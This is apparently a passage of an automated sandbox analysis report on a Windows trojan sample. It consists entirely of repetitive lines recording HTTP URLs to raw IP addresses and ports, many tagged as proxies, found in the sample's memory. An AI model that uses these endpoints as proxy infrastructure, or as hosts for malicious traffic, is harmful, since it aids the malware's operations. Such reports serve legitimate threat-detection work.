                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.235.187.227:62640
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.235.187.227:62640://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.236.106.236:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.236.106.236:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.120.240:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.120.240:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.251.24
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.251.24://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA52D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.251.24:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.4.250:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.4.250:31280k&
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.4.250:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.55.120:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.136.55.120:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.220.8.228:64312
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.220.8.228:64312://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.207.167
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.207.167://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.207.167:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.59.34:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.59.34:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.96.150:19291
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.230.96.150:19291://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.22.181.205:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.22.181.205:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.232.55.190
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.232.55.190://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.232.55.190:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:57248
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:57248://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78A0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:58111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:58111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:60637
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:60637://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.80.136.138:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.80.136.138:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.135.42:12438
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.135.42:12438://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.140.225:14719
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.140.225:14719://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.140.225:28119
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.140.225:28119://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.215.234:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.228.215.234:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.230.215.123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.230.215.123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.230.215.123:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.231.25.114:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.231.25.114:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.22
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.22://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.22:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.148.233:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.148.233:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.187.164:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.187.164:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.238.63:38080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.238.63:38080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.67.10.190:8100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.67.10.190:8100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.67.99.80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.67.99.80://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.67.99.80:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8029000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C801F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.70.139.52:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C801F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.70.139.52:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.70.244.240:16238
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.70.244.240:16238://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.127.194.62
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.127.194.62://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.127.194.62:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.127.42.160:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.127.42.160:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.19.91.77
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.19.91.77://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.19.91.77:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.92.214.224
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.92.214.224://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.92.214.224:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.0.14.116:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.0.14.116:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.113.121.60
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.113.121.60://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.118.228.212
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.118.228.212://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.118.228.212:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.178.107:29985
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.178.107:29985://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C94A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:16504
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:16504://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:17970
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:17970://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:25007
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:25007://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:25158
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:25158://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:38338
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:38338://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:41277
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:41277://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:52138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:52138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:54506
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:54506://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9444000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:57661
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:57661://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:62276
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:62276://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:8541
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.253.232:8541://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.255.155:64560
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.255.155:64560://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.159.243.94:4673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.159.243.94:4673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.194.52.93:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.194.52.93:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.61.207:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.61.207:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.62.171:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.62.171:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.62.43:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.62.43:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.63.79:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.201.63.79:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.202.107.92:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.202.107.92:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.202.109.144:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.202.109.144:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.202.109.44:3128
